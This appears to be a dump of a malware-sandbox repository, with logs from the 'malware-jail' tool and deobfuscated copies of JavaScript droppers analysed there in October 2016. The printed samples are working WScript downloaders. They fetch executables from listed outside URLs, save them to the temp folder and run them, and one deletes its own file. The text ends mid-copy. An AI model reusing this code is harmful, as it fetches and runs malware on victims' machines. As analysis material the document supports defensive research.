var params = "2ceb07f5fca8d743cbe59f1377900257"; 2 | var lnbpc = 'vtaere tnnexzmuuyghrnfhl=v\'zdh ureofvxaj=yltrn"amxurhlojlelpofoyntakrrchahfddbeosuegaaiqugehukeksnqituelnb"ism.zezny=jwe;naoictgczvt nAhjxbpOvesewXvMi"c(dSscntq.b2hLbXcXpMnTbTpHlPkMtLz=zbv;fny"p)tcgAm itbeeweOxXnehbbigvv(rthcc"tjjesphikrhttSvcbFs.ugwixitnmsryzSztzlbeejebyOremezmx;h)r"etkcktn=ccr{yWkrkytplicrotiSachiurrcgpt.rSilxlwugNptiFgim;pexfrazmhieFc.zld(mbksxiyxmtlegEn)s)bcebzsv(wehlsesto.hDaevluiq(selFqca}q;taact)gek(qhe)wtcclrjovfm(o{v}iil dra=dvrai=e Preparing Sandbox environment. 8 | 8 Oct 20:54:01 - => Executing: env/utils.js 9 | 8 Oct 20:54:01 - => Executing: env/eval.js 10 | 8 Oct 20:54:01 - Preparing sandbox to intercept eval() calls. 11 | 8 Oct 20:54:01 - => Executing: env/function.js 12 | 8 Oct 20:54:01 - Preparing sandbox to intercept 'new Function()' calls. 13 | 8 Oct 20:54:01 - => Executing: env/wscript.js 14 | 8 Oct 20:54:01 - Preparing sandbox to emulate WScript environment. 15 | 8 Oct 20:54:01 - => Executing: env/browser.js 16 | 8 Oct 20:54:01 - Preparing sandbox to emulate Browser environment (default = IE11). 17 | 8 Oct 20:54:01 - Created: window[1] 18 | 8 Oct 20:54:01 - Created: document[2] 19 | 8 Oct 20:54:01 - document[2].createElement(html) 20 | 8 Oct 20:54:01 - Element[3] created, named: 'html' 21 | 8 Oct 20:54:01 - document[2].createElement(body) 22 | 8 Oct 20:54:01 - Element[5] created, named: 'body' 23 | 8 Oct 20:54:01 - document[2].body = 'Element[5]' 24 | 8 Oct 20:54:01 - document[2].createElement(head) 25 | 8 Oct 20:54:01 - Element[7] created, named: 'head' 26 | 8 Oct 20:54:01 - Element[3].appendChild(Element[7]) 27 | 8 Oct 20:54:01 - Element[3].firstChild set 28 | 8 Oct 20:54:01 - document[2].body.get() => Element[5] 29 | 8 Oct 20:54:01 - Element[3].appendChild(Element[5]) 30 | 8 Oct 20:54:01 - => Executing: env/agents.js 31 | 8 Oct 20:54:01 - Setting Browser environment to: IE8 on Win10 64bit 32 | 8 Oct 20:54:01 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 8 Oct 20:54:01 - => Executing: env/other.js 34 | 8 Oct 20:54:01 - => Executing: env/console.js 35 | 8 Oct 20:54:01 - ==> Executing malware file(s). 36 | 8 Oct 20:54:01 - => Executing: malware/20161008/140da02684fd276b6c989317c8ba13f066373dc2623153776da5b8a3e4c7a59f.js 37 | 8 Oct 20:54:01 - Error.number => 2 38 | 8 Oct 20:54:01 - Strict mode: false 39 | 8 Oct 20:54:01 - Calling eval() no.: 1 40 | 8 Oct 20:54:01 - Strict mode: false 41 | 8 Oct 20:54:01 - Calling eval() no.: 2 42 | 8 Oct 20:54:01 - ActiveXObject(MSXML2.XMLHTTP) 43 | 8 Oct 20:54:01 - Created: MSXML2.XMLHTTP[9] 44 | 8 Oct 20:54:01 - ActiveXObject(Scripting.FileSystemObject) 45 | 8 Oct 20:54:01 - Scripting.FileSystemObject[10] created. 46 | 8 Oct 20:54:01 - Scripting.FileSystemObject[10].FileExists(script_full_name.js) 47 | 8 Oct 20:54:01 - Scripting.FileSystemObject[10].DeleteFile(script_full_name.js) 48 | 8 Oct 20:54:01 - MSXML2.XMLHTTP[9].open(GET,https://oolohlafrancaisedesqueues.net/2ceb07f5fca8d743cbe59f1377900257.flv,false) 49 | 8 Oct 20:54:01 - MSXML2.XMLHTTP[9].async = (boolean) 'false' 50 | 8 Oct 20:54:01 - MSXML2.XMLHTTP[9].async.get() => (boolean) 'false' 51 | 8 Oct 20:54:01 - MSXML2.XMLHTTP[9].send(null) 52 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].onreadystatechange(), readyState = 4 length: 162 status: 404 53 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9] statusText = null 54 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].responseBody = (object) '??404 Not Found????

404 Not Found ... (truncated)' 55 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].status = (number) '404' 56 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].onreadystatechange() undefined 57 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].send(null) finished 58 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].ResponseText.get() => (string) '??404 Not Found????

404 Not Found ... (truncated)' 59 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].ResponseText.get() => (string) '??404 Not Found????

404 Not Found ... (truncated)' 60 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].open(GET,https://oolohlafrancaisedesqueues.net/2ceb07f5fca8d743cbe59f1377900257.mp4,false) 61 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].async = (boolean) 'false' 62 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].async.get() => (boolean) 'false' 63 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].send(null) 64 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].onreadystatechange(), readyState = 4 length: 162 status: 404 65 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9] statusText = null 66 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].responseBody = (object) '??404 Not Found????

404 Not Found ... (truncated)' 67 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].status = (number) '404' 68 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].onreadystatechange() undefined 69 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].send(null) finished 70 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].ResponseText.get() => (string) '??404 Not Found????

404 Not Found ... (truncated)' 71 | 8 Oct 20:54:02 - Strict mode: false 72 | 8 Oct 20:54:02 - Calling eval() no.: 3 73 | 8 Oct 20:54:02 - Exception occured: object SyntaxError: Invalid or unexpected token 74 | at eval (env/eval.js:24:12) 75 | at eval (eval at eval (env/eval.js:24:12), :1:2178) 76 | at eval (env/eval.js:24:12) 77 | at eval (eval at eval (env/eval.js:24:12), :1:2851) 78 | at eval (env/eval.js:24:12) 79 | at malware/20161008/140da02684fd276b6c989317c8ba13f066373dc2623153776da5b8a3e4c7a59f.js:26:1 80 | at ContextifyScript.Script.runInContext (vm.js:35:29) 81 | at Object.exports.runInContext (vm.js:67:17) 82 | at run_in_ctx (/media/usb2/home/hynek/jscript/malware-jail/jailme.js:145:16) 83 | at Object. (/media/usb2/home/hynek/jscript/malware-jail/jailme.js:168:1) 84 | 8 Oct 20:54:02 - ==> Cleaning up sandbox. 85 | 8 Oct 20:54:02 - ==> Script execution finished, dumping sandbox environment to a file. 86 | 8 Oct 20:54:02 - MSXML2.XMLHTTP[9].ResponseBody.get() => (object) '??404 Not Found????

404 Not Found ... (truncated)' 87 | 8 Oct 20:54:02 - The sandbox context has been saved to: sandbox_dump_after.json 88 | -------------------------------------------------------------------------------- /malware/20161013/802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.out: -------------------------------------------------------------------------------- 1 | 13 Oct 23:47:06 - mailware-jail, a malware sandbox ver. 0.8 2 | 13 Oct 23:47:06 - ------------------------ 3 | 13 Oct 23:47:06 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 13 Oct 23:47:06 - Malware files: malware/20161013/802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.js 5 | 13 Oct 23:47:06 - Output file for sandbox dump: sandbox_dump_after.json 6 | 13 Oct 23:47:06 - Output directory for generated files: output/ 7 | 13 Oct 23:47:06 - ==> Preparing Sandbox environment. 8 | 13 Oct 23:47:06 - => Executing: env/utils.js 9 | 13 Oct 23:47:06 - => Executing: env/eval.js 10 | 13 Oct 23:47:06 - Preparing sandbox to intercept eval() calls. 11 | 13 Oct 23:47:06 - => Executing: env/function.js 12 | 13 Oct 23:47:06 - Preparing sandbox to intercept 'new Function()' calls. 13 | 13 Oct 23:47:06 - => Executing: env/wscript.js 14 | 13 Oct 23:47:06 - Preparing sandbox to emulate WScript environment. 15 | 13 Oct 23:47:06 - => Executing: env/browser.js 16 | 13 Oct 23:47:06 - Preparing sandbox to emulate Browser environment (default = IE11). 17 | 13 Oct 23:47:06 - Created: window[1] 18 | 13 Oct 23:47:06 - Created: document[2] 19 | 13 Oct 23:47:06 - document[2].createElement(html) 20 | 13 Oct 23:47:06 - Element[3] created, named: 'html' 21 | 13 Oct 23:47:06 - document[2].createElement(body) 22 | 13 Oct 23:47:06 - Element[5] created, named: 'body' 23 | 13 Oct 23:47:06 - document[2].body = 'Element[5]' 24 | 13 Oct 23:47:06 - document[2].createElement(head) 25 | 13 Oct 23:47:06 - Element[7] created, named: 'head' 26 | 13 Oct 23:47:06 - Element[3].appendChild(Element[7]) 27 | 13 Oct 23:47:06 - Element[3].firstChild set 28 | 13 Oct 23:47:06 - document[2].body.get() => Element[5] 29 | 13 Oct 23:47:06 - Element[3].appendChild(Element[5]) 30 | 13 Oct 23:47:06 - => Executing: env/agents.js 31 | 13 Oct 23:47:06 - Setting Browser environment to: IE8 on Win10 64bit 32 | 13 Oct 23:47:06 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 13 Oct 23:47:06 - => Executing: env/other.js 34 | 13 Oct 23:47:06 - => Executing: env/console.js 35 | 13 Oct 23:47:06 - ==> Executing malware file(s). 36 | 13 Oct 23:47:06 - => Executing: malware/20161013/802577e503bd1880e57b3bd3d3ed047d90a0f0aa0dee89a04a90944fc1f74f27.js 37 | 13 Oct 23:47:06 - WScript.Sleep(500) 38 | 13 Oct 23:47:06 - WScript.Sleep(500) 39 | 13 Oct 23:47:07 - WScript.Sleep(500) 40 | 13 Oct 23:47:07 - WScript.Sleep(500) 41 | 13 Oct 23:47:08 - WScript.Sleep(500) 42 | 13 Oct 23:47:08 - WScript.Sleep(500) 43 | 13 Oct 23:47:09 - WScript.Sleep(500) 44 | 13 Oct 23:47:09 - WScript.Sleep(500) 45 | 13 Oct 23:47:10 - WScript.Sleep(500) 46 | 13 Oct 23:47:10 - WScript.Sleep(500) 47 | 13 Oct 23:47:11 - WScript.Sleep(500) 48 | 13 Oct 23:47:11 - WScript.Sleep(500) 49 | 13 Oct 23:47:12 - WScript.Sleep(500) 50 | 13 Oct 23:47:12 - WScript.Sleep(500) 51 | 13 Oct 23:47:13 - WScript.CreateObject(WScript.Shell) 52 | 13 Oct 23:47:13 - Created: WScript.Shell[9] 53 | 13 Oct 23:47:13 - ActiveXObject(Scripting.FileSystemObject) 54 | 13 Oct 23:47:13 - Scripting.FileSystemObject[10] created. 55 | 13 Oct 23:47:13 - WScript.Shell[9].ExpandEnvironmentStrings(%TMP%) 56 | 13 Oct 23:47:13 - Scripting.FileSystemObject[10].OpenTextFile(%TMP%\XipXkrLd.js) 57 | 13 Oct 23:47:13 - TextStream[11] created. 58 | 13 Oct 23:47:13 - TextStream[11].Write("Thu Oct 13 2016 23:47:13 GMT+0200 (CEST)" 59 | var SvjUKAc = new Date(); 60 | while(true) { 61 | var XwHvxGz = new Date(); 62 | var ERupxfq = new Date(XwHvxGz.getTime() - SvjUKAc.getTime()); 63 | if(ERupxfq.getSeconds() > 5) { 64 | break; 65 | } 66 | WScript.Sleep(500); 67 | } 68 | function ckCgnMtxxk(ibZdbdKp,CnWtQRBnxBRw) {nhjyEhX=0x1;ScLQeYp=0x0;ibZdbdKp.Run(CnWtQRBnxBRw, nhjyEhX, ScLQeYp);} 69 | /*ToakIoXNFCHbmPvwLmfYFFdfZfhOyyKAhVBlGhbuYuaaPtQBjpqWMUQICukLkzPCPvwfXTyVLfMTKQFAbmUNmdXfyCGAptnxROKUHzooRKSGZhNsmcSyggxwOEwkOhfmmbrBLYyCrirmIspeQMjducrGyzFNHOrVaiscirbJkAkLKwkJOpUBbREKBnhjTpWxiiNxZDYJxM*/URjKuPKyMgrYr(); 70 | var mmcXR = ["http://lcbschool2.ac.th/pic/_notes/logs.php"]; 71 | var Wyiwp = ["http://masseriacarparelli.it/logs2.php"]; 72 | OsLAgfHCfdr(mmcXR, '23.exe'); 73 | OsLAgfHCfdr(Wyiwp, '24.exe'); 74 | function OsLAgfHCfdr(AUePbmz,xjshqCWtQ) { 75 | var RIHh=407-407; 76 | while(true) { 77 | if(AUePbmz.length<=366-366) break; 78 | var EOIT = xEnVXGW() % AUePbmz.length; 79 | var KyRewCCEJ=AUePbmz[EOIT]; 80 | var BIxHp=xEnVXGW(); 81 | var TlJTxfwLxp=xjshqCWtQ; 82 | var WDlUJfS=xjshqCWtQ; 83 | var cvSRFkdY=112-111; 84 | var LRACVIJdS = function(){ 85 | return new ActiveXObject(WDBmH('WS&WmSxvYpcV&cript&WmSxvYpcV&.She&l&l',[0,2,4,5,6],'&')); 86 | }(); 87 | var WDlUJfS = ldNrVl(LRACVIJdS) + String.fromCharCode(92) + WDlUJfS; 88 | var TbZdG = function(){ 89 | return new ActiveXObject(WDBmH('MSX&DiODGVvSB&ML2.XM&nmWtwgNOhvP&LHTTP',[0,2,4],'&')); 90 | }(); 91 | UYCO(KyRewCCEJ,TbZdG); 92 | if (TbZdG.status == 100+100) { 93 | var sWPmhUM = function() { 94 | return new ActiveXObject(WDBmH('ADO&DB&PGXbbEcUF&.&nEvdrVaCd&Stream',[0,1,3,5],'&')); 95 | }(); 96 | var pDdQcrVkhARc=qSeGr(sWPmhUM,TbZdG.ResponseBody,WDlUJfS); 97 | } 98 | try { 99 | ckCgnMtxxk(LRACVIJdS,WDlUJfS); 100 | var xtIxXmh = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \''+TlJTxfwLxp+'\''); 101 | if ( xtIxXmh.Count >= 1 ){break;} 102 | } catch(e) {} 103 | RIHh++; 104 | MBGwN.splice (EOIT,327-326); 105 | } 106 | } 107 | function ldNrVl(ByNmjV){var cxeVjMWm=["ExpandEnvironmentStrings"];return ByNmjV[cxeVjMWm[0]]('%TMP%')} 108 | function qSeGr(fVDGQccj,Cmwwv,JCtZgNyuNT){try{fVDGQccj.open();mEvJHgAm(fVDGQccj);ShSvKwv(fVDGQccj,Cmwwv);EXncmYqiN(fVDGQccj);SAxs(fVDGQccj,JCtZgNyuNT);KlpoACZP=fVDGQccj.size;wcAPLEY(fVDGQccj);return KlpoACZP;}catch(e){}} 109 | function UYCO(pEjdKZ,EZDobvT){try{bkIe = 'G*tqEiSfCEFO*E*T*sqkdtRMjxeQR'.split('*');EZDobvT.open(bkIe[0]+bkIe[2]+bkIe[3], pEjdKZ, false);EZDobvT.setRequestHeader("User-Agent", "Python-urllib/3.1");EZDobvT.send();}catch(e){}} 110 | function WDBmH(mxhXCKNI,zTOiBb,woGPxsmnc){nymYF=mxhXCKNI.split(woGPxsmnc);VvdgKnq = 'isR';for(ltaWmxhr=0;ltaWmxhr Cleaning up sandbox. 128 | 13 Oct 23:47:13 - ==> Script execution finished, dumping sandbox environment to a file. 129 | 13 Oct 23:47:13 - Saving: output/_TMP__XipXkrLd.js 130 | 13 Oct 23:47:13 - Generated file saved 131 | 13 Oct 23:47:13 - The sandbox context has been saved to: sandbox_dump_after.json 132 | -------------------------------------------------------------------------------- /malware/20161013/_TMP__XipXkrLd.js: -------------------------------------------------------------------------------- 1 | "Thu Oct 13 2016 23:47:13 GMT+0200 (CEST)" 2 | var SvjUKAc = new Date(); 3 | while (true) { 4 | var XwHvxGz = new Date(); 5 | var ERupxfq = new Date(XwHvxGz.getTime() - SvjUKAc.getTime()); 6 | if (ERupxfq.getSeconds() > 5) { 7 | break; 8 | } 9 | WScript.Sleep(500); 10 | } 11 | 12 | function ckCgnMtxxk(ibZdbdKp, CnWtQRBnxBRw) { 13 | nhjyEhX = 0x1; 14 | ScLQeYp = 0x0; 15 | ibZdbdKp.Run(CnWtQRBnxBRw, nhjyEhX, ScLQeYp); 16 | } 17 | /*ToakIoXNFCHbmPvwLmfYFFdfZfhOyyKAhVBlGhbuYuaaPtQBjpqWMUQICukLkzPCPvwfXTyVLfMTKQFAbmUNmdXfyCGAptnxROKUHzooRKSGZhNsmcSyggxwOEwkOhfmmbrBLYyCrirmIspeQMjducrGyzFNHOrVaiscirbJkAkLKwkJOpUBbREKBnhjTpWxiiNxZDYJxM*/ 18 | URjKuPKyMgrYr(); 19 | var mmcXR = ["http://lcbschool2.ac.th/pic/_notes/logs.php"]; 20 | var Wyiwp = ["http://masseriacarparelli.it/logs2.php"]; 21 | OsLAgfHCfdr(mmcXR, '23.exe'); 22 | OsLAgfHCfdr(Wyiwp, '24.exe'); 23 | 24 | function OsLAgfHCfdr(AUePbmz, xjshqCWtQ) { 25 | var RIHh = 407 - 407; 26 | while (true) { 27 | if (AUePbmz.length <= 366 - 366) break; 28 | var EOIT = xEnVXGW() % AUePbmz.length; 29 | var KyRewCCEJ = AUePbmz[EOIT]; 30 | var BIxHp = xEnVXGW(); 31 | var TlJTxfwLxp = xjshqCWtQ; 32 | var WDlUJfS = xjshqCWtQ; 33 | var cvSRFkdY = 112 - 111; 34 | var LRACVIJdS = function() { 35 | return new ActiveXObject(WDBmH('WS&WmSxvYpcV&cript&WmSxvYpcV&.She&l&l', [0, 2, 4, 5, 6], '&')); 36 | }(); 37 | var WDlUJfS = ldNrVl(LRACVIJdS) + String.fromCharCode(92) + WDlUJfS; 38 | var TbZdG = function() { 39 | return new ActiveXObject(WDBmH('MSX&DiODGVvSB&ML2.XM&nmWtwgNOhvP&LHTTP', [0, 2, 4], '&')); 40 | }(); 41 | UYCO(KyRewCCEJ, TbZdG); 42 | if (TbZdG.status == 100 + 100) { 43 | var sWPmhUM = function() { 44 | return new ActiveXObject(WDBmH('ADO&DB&PGXbbEcUF&.&nEvdrVaCd&Stream', [0, 1, 3, 5], '&')); 45 | }(); 46 | var pDdQcrVkhARc = qSeGr(sWPmhUM, TbZdG.ResponseBody, WDlUJfS); 47 | } 48 | try { 49 | ckCgnMtxxk(LRACVIJdS, WDlUJfS); 50 | var xtIxXmh = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \'' + TlJTxfwLxp + '\''); 51 | if (xtIxXmh.Count >= 1) { 52 | break; 53 | } 54 | } catch (e) {} 55 | RIHh++; 56 | MBGwN.splice(EOIT, 327 - 326); 57 | } 58 | } 59 | 60 | function ldNrVl(ByNmjV) { 61 | var cxeVjMWm = ["ExpandEnvironmentStrings"]; 62 | return ByNmjV[cxeVjMWm[0]]('%TMP%') 63 | } 64 | 65 | function qSeGr(fVDGQccj, Cmwwv, JCtZgNyuNT) { 66 | try { 67 | fVDGQccj.open(); 68 | mEvJHgAm(fVDGQccj); 69 | ShSvKwv(fVDGQccj, Cmwwv); 70 | EXncmYqiN(fVDGQccj); 71 | SAxs(fVDGQccj, JCtZgNyuNT); 72 | KlpoACZP = fVDGQccj.size; 73 | wcAPLEY(fVDGQccj); 74 | return KlpoACZP; 75 | } catch (e) {} 76 | } 77 | 78 | function UYCO(pEjdKZ, EZDobvT) { 79 | try { 80 | bkIe = 'G*tqEiSfCEFO*E*T*sqkdtRMjxeQR'.split('*'); 81 | EZDobvT.open(bkIe[0] + bkIe[2] + bkIe[3], pEjdKZ, false); 82 | EZDobvT.setRequestHeader("User-Agent", "Python-urllib/3.1"); 83 | EZDobvT.send(); 84 | } catch (e) {} 85 | } 86 | 87 | function WDBmH(mxhXCKNI, zTOiBb, woGPxsmnc) { 88 | nymYF = mxhXCKNI.split(woGPxsmnc); 89 | VvdgKnq = 'isR'; 90 | for (ltaWmxhr = 0; ltaWmxhr < zTOiBb.length; ltaWmxhr++) { 91 | VvdgKnq += nymYF[zTOiBb[ltaWmxhr]]; 92 | } 93 | return VvdgKnq.substring(3, VvdgKnq.length); 94 | } 95 | 96 | function URjKuPKyMgrYr() { /*BCKSGFxZTW().Sleep(5311-410);*/ } 97 | 98 | function YEPOLKB() { 99 | var NIZqdP = ["random"]; 100 | return Math[NIZqdP[0]]() 101 | } 102 | 103 | function iPtA(EVWlhq) { 104 | EVWlhq.open(); 105 | } 106 | 107 | function mEvJHgAm(XPaMCcbtn) { 108 | XPaMCcbtn.type = 1; 109 | } 110 | 111 | function ShSvKwv(UBBO, aRAhF) { 112 | UBBO.write(aRAhF); 113 | } 114 | 115 | function BCKSGFxZTW() { 116 | return /*XQRmBOFMbTPjQDAMKQpicfpILteYagMoPpTqwtDpMrwYdHDBnmBJHHxIfOUkXgZzcIpnLSVMQJxHJEZjjChdGcYCTcfpoaFEIVeetkGco*/ WScript; 117 | } 118 | 119 | function EXncmYqiN(hbpFEH) { 120 | var pOTTAMeVOw = []; 121 | hbpFEH.position = pOTTAMeVOw.length * (4714679 - 679); 122 | } 123 | 124 | function SAxs(nTrxTKR, kQmMEIk) { 125 | nTrxTKR.saveToFile(kQmMEIk, 2); 126 | } 127 | 128 | function wcAPLEY(NZHgp) { 129 | NZHgp.close(); 130 | } 131 | 132 | function xEnVXGW() { 133 | var AzTJ = 99999 + 1; 134 | var vaVlYa = 100; 135 | return Math.round(YEPOLKB() * (AzTJ - vaVlYa) + vaVlYa); 136 | } 137 | 138 | function QOawkeUO(iqwZo) { 139 | var maBHbxuS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'; 140 | for (var xfbbJ = 0; xfbbJ < iqwZo; xfbbJ++) { 141 | QvLxV += maBHbxuS.charAt(Math.floor(Math.random() * maBHbxuS.length)); 142 | } 143 | return QvLxV; 144 | } 145 | 146 | function xfgtzigMYScAlH(XVdzyJUSJbBLjI) { 147 | return new ActiveXObject(XVdzyJUSJbBLjI); 148 | } 149 | -------------------------------------------------------------------------------- /malware/20161013/_TMP__XipXkrLd.out: -------------------------------------------------------------------------------- 1 | 14 Oct 00:03:18 - mailware-jail, a malware sandbox ver. 0.8 2 | 14 Oct 00:03:18 - ------------------------ 3 | 14 Oct 00:03:18 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js 4 | 14 Oct 00:03:18 - Malware files: malware/20161013/_TMP__XipXkrLd.js 5 | 14 Oct 00:03:18 - Output file for sandbox dump: sandbox_dump_after.json 6 | 14 Oct 00:03:18 - Output directory for generated files: output/ 7 | 14 Oct 00:03:18 - ==> Preparing Sandbox environment. 8 | 14 Oct 00:03:18 - => Executing: env/utils.js 9 | 14 Oct 00:03:18 - => Executing: env/eval.js 10 | 14 Oct 00:03:18 - Preparing sandbox to intercept eval() calls. 11 | 14 Oct 00:03:18 - => Executing: env/function.js 12 | 14 Oct 00:03:18 - Preparing sandbox to intercept 'new Function()' calls. 13 | 14 Oct 00:03:18 - => Executing: env/wscript.js 14 | 14 Oct 00:03:18 - Preparing sandbox to emulate WScript environment. 15 | 14 Oct 00:03:18 - => Executing: env/browser.js 16 | 14 Oct 00:03:18 - Preparing sandbox to emulate Browser environment (default = IE11). 17 | 14 Oct 00:03:18 - Created: window[1] 18 | 14 Oct 00:03:18 - Created: document[2] 19 | 14 Oct 00:03:18 - document[2].createElement(html) 20 | 14 Oct 00:03:18 - Element[3] created, named: 'html' 21 | 14 Oct 00:03:18 - document[2].createElement(body) 22 | 14 Oct 00:03:18 - Element[5] created, named: 'body' 23 | 14 Oct 00:03:18 - document[2].body = 'Element[5]' 24 | 14 Oct 00:03:18 - document[2].createElement(head) 25 | 14 Oct 00:03:18 - Element[7] created, named: 'head' 26 | 14 Oct 00:03:18 - Element[3].appendChild(Element[7]) 27 | 14 Oct 00:03:18 - Element[3].firstChild set 28 | 14 Oct 00:03:18 - document[2].body.get() => Element[5] 29 | 14 Oct 00:03:18 - Element[3].appendChild(Element[5]) 30 | 14 Oct 00:03:18 - => Executing: env/agents.js 31 | 14 Oct 00:03:18 - Setting Browser environment to: IE8 on Win10 64bit 32 | 14 Oct 00:03:18 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated) 33 | 14 Oct 00:03:18 - => Executing: env/other.js 34 | 14 Oct 00:03:18 - => Executing: env/console.js 35 | 14 Oct 00:03:18 - ==> Executing malware file(s). 36 | 14 Oct 00:03:18 - => Executing: malware/20161013/_TMP__XipXkrLd.js 37 | 14 Oct 00:03:18 - WScript.Sleep(500) 38 | 14 Oct 00:03:18 - WScript.Sleep(500) 39 | 14 Oct 00:03:19 - WScript.Sleep(500) 40 | 14 Oct 00:03:19 - WScript.Sleep(500) 41 | 14 Oct 00:03:20 - WScript.Sleep(500) 42 | 14 Oct 00:03:20 - WScript.Sleep(500) 43 | 14 Oct 00:03:21 - WScript.Sleep(500) 44 | 14 Oct 00:03:21 - WScript.Sleep(500) 45 | 14 Oct 00:03:22 - WScript.Sleep(500) 46 | 14 Oct 00:03:22 - WScript.Sleep(500) 47 | 14 Oct 00:03:23 - WScript.Sleep(500) 48 | 14 Oct 00:03:23 - WScript.Sleep(500) 49 | 14 Oct 00:03:24 - ActiveXObject(WScript.Shell) 50 | 14 Oct 00:03:24 - Created: WScript.Shell[9] 51 | 14 Oct 00:03:24 - WScript.Shell[9].ExpandEnvironmentStrings(%TMP%) 52 | 14 Oct 00:03:24 - ActiveXObject(MSXML2.XMLHTTP) 53 | 14 Oct 00:03:24 - Created: MSXML2.XMLHTTP[10] 54 | 14 Oct 00:03:24 - MSXML2.XMLHTTP[10].open(GET,http://lcbschool2.ac.th/pic/_notes/logs.php,false) 55 | 14 Oct 00:03:24 - MSXML2.XMLHTTP[10].async = (boolean) 'false' 56 | 14 Oct 00:03:24 - MSXML2.XMLHTTP[10].async.get() => (boolean) 'false' 57 | 14 Oct 00:03:24 - MSXML2.XMLHTTP[10].setRequestHeader(User-Agent, Python-urllib/3.1) 58 | 14 Oct 00:03:24 - MSXML2.XMLHTTP[10].send(undefined) 59 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].onreadystatechange(), readyState = 4 length: 16 status: 404 60 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10] statusText = null 61 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].responseBody = (object) 'File not found.?' 62 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].status = (number) '404' 63 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].onreadystatechange() undefined 64 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].send(undefined) finished 65 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].status.get() => (number) '404' 66 | 14 Oct 00:03:41 - WScript.Shell[9].Run(%TMP%\23.exe, 1, 0) 67 | 14 Oct 00:03:41 - Exception occured: object ReferenceError: MBGwN is not defined 68 | at OsLAgfHCfdr (malware/20161013/_TMP__XipXkrLd.js:56:9) 69 | at malware/20161013/_TMP__XipXkrLd.js:21:1 70 | at ContextifyScript.Script.runInContext (vm.js:35:29) 71 | at Object.exports.runInContext (vm.js:67:17) 72 | at run_in_ctx (/media/usb2/home/hynek/jscript/malware-jail/jailme.js:145:16) 73 | at Object. (/media/usb2/home/hynek/jscript/malware-jail/jailme.js:168:1) 74 | at Module._compile (module.js:556:32) 75 | at Object.Module._extensions..js (module.js:565:10) 76 | at Module.load (module.js:473:32) 77 | at tryModuleLoad (module.js:432:12) 78 | 14 Oct 00:03:41 - ==> Cleaning up sandbox. 79 | 14 Oct 00:03:41 - ==> Script execution finished, dumping sandbox environment to a file. 80 | 14 Oct 00:03:41 - MSXML2.XMLHTTP[10].ResponseBody.get() => (object) 'File not found.?' 81 | 14 Oct 00:03:41 - The sandbox context has been saved to: sandbox_dump_after.json 82 | -------------------------------------------------------------------------------- /malware/20161013/out/malware_20161013__TMP__XipXkrLd.js: -------------------------------------------------------------------------------- 1 | "Thu Oct 13 2016 23:47:13 GMT+0200 (CEST)" 2 | var SvjUKAc = new Date(); 3 | while (true) { 4 | var XwHvxGz = new Date(); 5 | var ERupxfq = new Date(XwHvxGz.getTime() - SvjUKAc.getTime()); 6 | if (ERupxfq.getSeconds() > 5) { 7 | break; 8 | } 9 | WScript.Sleep(500); 10 | } 11 | 12 | function ckCgnMtxxk(ibZdbdKp, CnWtQRBnxBRw) { 13 | nhjyEhX = 0x1; 14 | ScLQeYp = 0x0; 15 | ibZdbdKp.Run(CnWtQRBnxBRw, nhjyEhX, ScLQeYp); 16 | } 17 | /*ToakIoXNFCHbmPvwLmfYFFdfZfhOyyKAhVBlGhbuYuaaPtQBjpqWMUQICukLkzPCPvwfXTyVLfMTKQFAbmUNmdXfyCGAptnxROKUHzooRKSGZhNsmcSyggxwOEwkOhfmmbrBLYyCrirmIspeQMjducrGyzFNHOrVaiscirbJkAkLKwkJOpUBbREKBnhjTpWxiiNxZDYJxM*/ 18 | URjKuPKyMgrYr(); 19 | var mmcXR = ["http://lcbschool2.ac.th/pic/_notes/logs.php"]; 20 | var Wyiwp = ["http://masseriacarparelli.it/logs2.php"]; 21 | OsLAgfHCfdr(mmcXR, '23.exe'); 22 | OsLAgfHCfdr(Wyiwp, '24.exe'); 23 | 24 | function OsLAgfHCfdr(AUePbmz, xjshqCWtQ) { 25 | var RIHh = 407 - 407; 26 | while (true) { 27 | if (AUePbmz.length <= 366 - 